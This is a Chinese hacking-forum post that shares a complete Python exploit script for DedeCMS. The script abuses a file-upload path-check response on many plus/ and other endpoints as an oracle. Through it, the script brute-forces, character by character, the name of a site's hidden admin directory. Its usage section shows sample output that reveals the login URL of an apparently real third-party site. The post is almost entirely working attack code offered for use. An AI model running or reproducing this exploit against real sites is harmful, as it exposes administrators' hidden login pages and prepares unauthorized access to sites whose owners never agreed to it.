Board logo

标题: [分享] dede后台爆破终结版 [打印本页]
作者: hacked    时间: 2018-12-6 16:28     标题: dede后台爆破终结版

  1.     #!/usr/bin/env python
  2.     #coding:utf-8
  3.     import requests
  4.     import itertools
  5.     from random import choice
  6.     import sys

  8.     characters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_!#@-"
  9.     back_dir = ""

  11.     show_message = {}
  12.     check_message = {}
  13.     valid_file = []
  14.     data = {
  15.         "_FILES[tools][tmp_name]" : "./../{p}<</images/adminico.gif",
  16.         "_FILES[tools][name]" : 0,
  17.         "_FILES[tools][size]" : 0,
  18.         "_FILES[tools][type]" : "image/gif"
  19.     }

  21.     headers = {
  22.             
  23.                             "User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0",
  24.                         "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
  25.                         "Accept-Language":"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
  26.                         "Content-Type":"application/x-www-form-urlencoded",
  27.                         "Connection":"Close"
  28.     }

  30.     class Bute_Login:
  31.             global headers
  32.             def __init__(self,target):
  33.                     self.target = target

  35.             def Check(self):
  36.                     global data,check_message,valid_file
  37.                   
  38.                     File_Chek_List =['/tags.php','/include/vdimgck.php','/m/list.php','/m/view.php','/member/config.php','/plus/advancedsearch.php',
  39.                                       '/plus/arcmulti.php','/plus/bookfeedback.php','/plus/bookfeedback_js.php','/plus/car.php','/plus/carbuyaction.php',
  40.                                       '/plus/comments_frame.php','/plus/count.php','/plus/digg_ajax.php','/plus/digg_frame.php','/plus/digg_frame.php',
  41.                                          '/plus/disdls.php','/plus/diy.php','/plus/download.php','/plus/erraddsave.php',
  42.                                          '/plus/feedback.php','/plus/feedback_ajax.php','/plus/flink.php','/plus/flink.php','/plus/flink_add.php',
  43.                                          '/plus/freelist.php','/plus/heightsearch.php','/plus/list.php','/plus/mytag_js.php',
  44.                                          '/plus/posttocar.php','/plus/qrcode.php','/plus/recommend.php','/plus/rss.php','/plus/search.php','/plus/showphoto.php',
  45.                                          '/plus/stow.php','/plus/view.php','/plus/vote.php','/special/index.php']
  46.                     for filename in File_Chek_List:
  47.                             try:
  48.                                     res = requests.post(self.target+filename,data=data)
  49.                                     #print self.target+filename+"--->"+res.text
  50.                                     if "Upload filetype not allow !" in res.text and res.status_code == 200:
  51.                                             valid_file.append(filename)
  52.                             except:
  53.                                     pass
  54.                     #print valid_file
  55.                     #print valid_file
  56.                     if len(valid_file):
  57.                             if "/tags.php" in valid_file:
  58.                                     for i in valid_file:
  59.                                             if i == "/tags.php":
  60.                                                     return i
  61.                             else:
  62.                                     file_name = choice(valid_file)
  63.                                     return file_name
  64.                     else:
  65.                             return False

  67.             def Bute(self):
  68.                     f_name = self.Check()
  69.                     #print f_name
  70.                     if f_name != False:
  71.                             if f_name == "/tags.php":
  72.                                     prefix = "./"
  73.                             else:
  74.                                     prefix = "./../"
  75.                             flag = 0
  76.                             global characters,back_dir,data,check_message
  77.                             for num in range(1,7):        
  78.                                     if flag:
  79.                                             break
  80.                                     for pre in itertools.permutations(characters,num):
  81.                                             pre = ''.join(list(pre))
  82.                                             data["_FILES[tools][tmp_name]"] = data["_FILES[tools][tmp_name]"].format(p=pre)
  83.                                             print("testing",pre)
  84.                                             r = requests.post(self.target+f_name,data=data)
  85.                                             if "Upload filetype not allow !" not in r.text and r.status_code == 200:
  86.                                                     flag = 1
  87.                                                     back_dir = pre
  88.                                                     data["_FILES[tools][tmp_name]"] = "%s{p}<</images/adminico.gif"%prefix
  89.                                                     break
  90.                                             else:
  91.                                                     data["_FILES[tools][tmp_name]"] = "%s{p}<</images/adminico.gif"%prefix
  92.                             #print("[+] 前缀为:",back_dir)
  93.                             flag = 0
  94.                             for i in range(30):
  95.                                     if flag:
  96.                                             break
  97.                                     for ch in characters:
  98.                                             if ch == characters[-1]:
  99.                                                     flag = 1
  100.                                                     break
  101.                                             data["_FILES[tools][tmp_name]"] = data["_FILES[tools][tmp_name]"].format(p=back_dir+ch)
  102.                                             r = requests.post(self.target+f_name, data=data)
  103.                                             if "Upload filetype not allow !" not in r.text and r.status_code == 200:
  104.                                                     back_dir += ch
  105.                                                     #print("[+] ",back_dir)
  106.                                                     data["_FILES[tools][tmp_name]"] = "%s{p}<</images/adminico.gif"%prefix
  107.                                                     break
  108.                                             else:
  109.                                                     data["_FILES[tools][tmp_name]"] = "%s{p}<</images/adminico.gif"%prefix
  110.                             show_message['Login_url'] = self.target+"/%s"%back_dir
  111.                            
  112.                             print show_message
  113.                             return show_message
  114.                     else:
  115.                             check_message['Enumerate'] = False
  116.                             print check_message
  117.                             return check_message


  120.     def main(url):
  121.             N = Bute_Login(url)
  122.             N.Bute()

  124.     '''
  125.     usage:        python .\dede_login.py -u [url]http://www.xxx.com[/url]
  126.     output:
  127.                     ('testing', 'a')
  128.                     ('testing', 'b')
  129.                     ('testing', 'c')
  130.                     {'Login_url': 'http://www.chuheautism.com/cha'}

  132.     '''

  134.     if __name__ == '__main__':
  135.             if sys.argv[1] == "-u":
  136.                     main(sys.argv[2])
复制代码




欢迎光临 全球被黑站点统计系统论坛 - Hacked.com.cn (http://forum.hacked.com.cn/) Powered by Discuz! 7.2